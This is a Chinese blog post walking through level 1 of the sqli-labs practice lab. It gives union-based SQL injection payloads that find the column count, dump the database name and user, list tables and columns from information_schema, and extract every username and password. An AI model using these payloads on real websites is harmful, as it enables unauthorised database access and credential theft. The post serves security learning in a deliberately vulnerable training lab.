# WEB --sql-labs--1

最新推荐文章于 2024-05-31 12:37:18 发布
最新推荐文章于 2024-05-31 12:37:18 发布
阅读量52 收藏
点赞数
文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52804141/article/details/128335229
版权

判断列数

id=1' order by 3 -- s

 

id=1' order by 4 -- s

 

判断回显点

id=0' union select 1,2,3 -- s //判断回显点是要将id=0,或者负数因为当id=1或者其他数字时,其在数据库中存在数据,在这种情况下,会优先输出数据库中的内容如图所示

 

 

爆出数据库与用户名

id=0' union select 1,user(),database() -- s

 

根据数据库名爆出数据表名

id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+

 

id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()-- s

 

id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'-- s

 

根据数据库表名爆出字段名

id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--s
​

 

爆出所有用户名和密码

id=0' union select 1,group_concat(username),group_concat(password) from users--+

 

总结;

1,单引号字符型注入

 

 

 

 

2,

union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'-- s

(1)group_concat函数是将查询到的每行结果以某个字段名进行合并,每一行合并的结果以逗号分隔开

(2 从information_schema数据库中的tables表中查找数据库security所含有的表有哪些

weixin_52804141
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFHUB-web-SQL注入
ookami6497的博客
11-29 712
CTFHUB SQL
Sql-labs环境搭建
shannow_123的博客
06-03 6683
SQL-LAB环境搭建 直接用wamp搭建环境 从GitHub上下载SQL-LABS https://github.com/Audi-1/sqli-labs 将文件解压到wamp的www目录下 访问http://127.0.0.1/sqli-labs-master/ 点击Setup/reset Database for labs创建数据库 有报错 Call to undefined functio...
Web-搭建upload-labs和sql-labs环境
mentions的博客
02-05 806
一.upload-labs环境搭建 1.首先要下载phpstudy,大家自行安装,我下载的是2018版本的 下载链接:Windows版phpstudy下载 - 小皮面板(phpstudy)https://www.xp.cn/download.html2.下载upload-labs的源代码 下载链接:https://codeload.github.com/c0ny1/upload-labs/zip/refs/heads/master 接着将压缩包解压,将解压后的文件放入phpstudy-->PH
SQL&sqli-labs-master
Jackie's Blog
04-03 681
SQL注入学习&个人sqli-labs-master靶场练习
sql-labs通关
qq_74806534的博客
03-04 491
通过随机输入id得知网址后面接?id=1:1.数字型 2.字符型1.Url 地址后面输入?id= 1 and 1=1 页面依旧运行正常,继续进行下一步。2.Url 地址后面继续输入?id= 1 and 1=2 ,页面运行错误,则说明此 Sql 注入为数字型注入。1.Url 地址后面输入?id= 1' and '1'='1 页面依旧运行正常,继续进行下一步。​2.Url 地址后面继续输入?id= 1' and '1'='2 ,页面运行错误,则说明此 Sql 注入为字符型注入。​。
SQL注入之sqli-labs
m0_60716947的博客
04-08 7175
目录 (一)搭建 sqli-labs 靶场 (二)sqli-labs的第一关至第四关笔记 (1)第一关 sqli-labs 是一款基于 sql 注入的游戏教程,有利于更好地了解 sql 注入的语法。 (一)搭建 sqli-labs 靶场 搭建 sqli-labs 靶场前首先要下载 phpstudy phpstudy下载链接:https://www.xp.cn 要保证安装路径中不能有空格和中文。 下载完成后: 可以对 root 数据库进行修改密码或创建数据库,然后在软件管理..
sql-labs闯关32~37
qq_44663230的博客
09-04 1939
sql-labs闯关32~37 宽字节注入集合
sqli-labs 页面显示sql语句 方便注入
snowlyzz的博客
03-10 684
在sqli-labs 目录下点击关卡目录 编辑index.txt 在$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";下 输入echo $sql; 和echo "<br>"; 能看到中间已经有了SQL语句。方便之后的练习
SQL注入练习--sqli-labs
qq_46263951的博客
02-12 2623
前言 SQL注入是比较常见的漏洞,有数据库的地方就可能存在SQL注入,所以学好SQL注入是非常有必要的,sqli-labs是一个不错的练习靶场。推荐一篇文章SQL注入之Mysql注入姿势及绕过总结 前置知识 注入流程 判断是否存在注入,注入是字符型还是数字型,闭合情况,绕过方式 ?id=1' ?id=1" ?id=1') ?id=1") ?id=1' or 1# ?id=1' or 0# ?id=1' or 1=1# ?id=1' and 1=2# ?id=1' and sleep(5)# ?id=
web靶场 --- sqli-labs
L0g1c的博客
07-06 1268
SQL注入的本质是用户输入的数据被当作代码执行mysql语法:查库: 查表:查列:查字段: 查看是否有注入 确实存在SQL注入漏洞查看有多少列先使用 再使用 所以得到users表有3列查看哪些数据可以回显[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-drLNqXTv-1657118499948)(https://raw.githubusercontent.com/Ckingt-k/photos/main/image-20220706192047368.png)]查看当前数
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqli-labs-master.zip
03-17
SQL-labs靶场,练习sql注入,适合新手练习漏洞基础,web安全,渗透,漏洞基础,典型漏洞,漏洞原理刨析,搭建在自己虚拟键,带源码,多分析 ,仅供学习
sql-labs 1-10关 含多种解法 包括sqlmap py脚本
07-23
全部免费 仅供学习使用
sqli-labs视频
02-23
sqli-labs视频
sqli-labs(php7.3以上可运行)
01-29
学习sql注入的开源平台
【PostgreSQL17新特性之-explain命令新增选项】
最新发布
小怪兽的博客
05-31 541
PostgreSQL17-beta1版本近日发布了,新版本里,explain命令新增了两个选项,分别是MEMORY 和SUMMARY。
基础—SQL—DQL(数据查询语言)聚合函数
m0_74363339的博客
05-30 255
这篇博客主要讲到了SQL分类中的DQL(数据查询语言)—聚合函数的讲解,聚合函数比较简单,但它主要配合着分组查询进行数据查询的操作,注意NULL的字段值不参与聚合函数的运算......
PostgreSQL常用插件
PGCCC的博客
05-29 509
1.提供 PostgreSQL 实例的操作系统级别的资源使用情况,包括缓存命中率和磁盘 IO 等。通过使用这些插件,您可以大大增强 PostgreSQL 的功能,满足各种复杂的应用需求。1.提供三元组(trigram)相似度匹配和索引功能,常用于模糊搜索和文本相似度匹配。1.增加对地理空间数据的支持,使 PostgreSQL 成为一个功能强大的空间数据库。1.PostgreSQL 的过程语言,允许用户编写存储过程和触发器。1.基于逻辑复制的插件,提供更细粒度的数据复制控制和双向复制能力。
postgressql——Tuple学习(2)
Re_view的博客
05-27 269
postgressql——Tuple学习(2)
sql-labs安装
08-28
您可以从 GitHub 上的项目页面(https://github.com/Audi-1/sqli-labs)下载最新的 ZIP 文件,并将其解压缩到您的 Web 服务器的文档根目录中。 3. 在 MySQL 数据库中创建一个新的数据库,用于存储 SQL-Labs 的数据...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值